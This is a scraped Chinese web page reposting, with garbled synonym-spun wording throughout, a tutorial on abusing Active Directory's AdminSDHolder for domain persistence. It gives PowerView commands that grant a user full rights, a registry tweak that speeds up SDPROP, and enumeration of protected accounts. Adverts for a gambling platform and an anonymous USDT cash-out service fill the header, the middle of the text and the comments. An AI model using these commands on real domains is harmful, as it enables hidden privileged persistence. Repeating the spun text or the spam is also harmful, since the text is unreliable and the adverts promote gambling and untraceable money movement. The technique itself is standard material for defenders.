皇冠体育寻求亚洲战略合作伙伴,皇冠代理招募中,皇冠平台开放会员注册、充值、提现、电脑版下载、APP下载。

首页科技正文

usdt充值教程(www.caibao.it):手艺分享 | 域渗透AdminSDHolder

admin2021-03-12107资讯

USDT自动API接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

AdminSDHolder是一个特殊的AD容器,通常作为某些特权组成员的工具的平安模板。Active Directory将接纳AdminSDHolder工具的ACL并定期将其应用于所有受珍爱的AD账户和组,以防止意外和无意的修改并确保对这些工具的接见是平安的。

本文由锦行科技的平安研究团队提供,旨在从攻击者的视角还原AdminSDHolder的渗透历程。

一、设置

1、添加:

在域控上操作AdminSDHolder工具的ACL

添加用户test对AdminSDHolder的完全接见权限

powerview:

Add-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity test -Rights All

*由于SDPROP的缘故原由,默认守候60分钟之后生效

2、验证:

Powerview:

Get-DomainObjectAcl adminsdholder | ?{$_.SecurityIdentifier -match "S-1-5-21-363618500-3918876104-3124729890-1139"} | select objectdn,ActiveDirectoryRights |sort -Unique

ADSI:

,

Usdt第三方支付接口

菜宝钱包(www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

3、删除:

Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity test -Rights All -Verbose

二、SDPROP

为了将可继续ACE的更改流传到后裔工具,域控制器运行一个称为平安形貌符流传器(SDPROP)的后台义务。通过修改工具的平安形貌符或移动工具时触发此义务。当修改了AdminSDHolder的ACL之后默认守候60分钟以后生效,原理是SDPROP历程在PDC模拟器上每60分钟运行一次,并使用AdminSDHolder设置的平安权限重新符号ACL。

1、注册表SDPROP运营频率: 

修改成守候60秒

reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 60

2、手动触发SDPROP历程: 

运行->LDP.exe->菜单>毗邻->毗邻->服务器输入当前的机械名,端口默以为389

然后毗邻->绑定凭证->作为当前登录的用户绑定->然后浏览->修改,在属性选项卡中输入FixUpInheritance。在值字段中输入Yes。操作选择添加,然后单击输入,最后运行即可,运行。

三、行使场景

已经获得域控权限,行使AdminSDHolder来举行权限维持,或者寻找受珍爱AD账户为目的。

枚举受珍爱AD账户

Get-NetUser -AdminCount |select samaccountname

登录test用户,可以看到test非域管组,却能执行域管权限的下令。

网友评论

1条评论
  • 2021-05-14 00:01:39

    皇冠注册平台皇冠注册平台(www.huangguan.us)是一个开放皇冠即时比分、皇冠官网注册的平台。皇冠注册平台(www.huangguan.us)专业解决皇冠会员怎么申请开户、怎么申请皇冠信用盘代理、皇冠公司的代理怎么拿的问题。很6的写法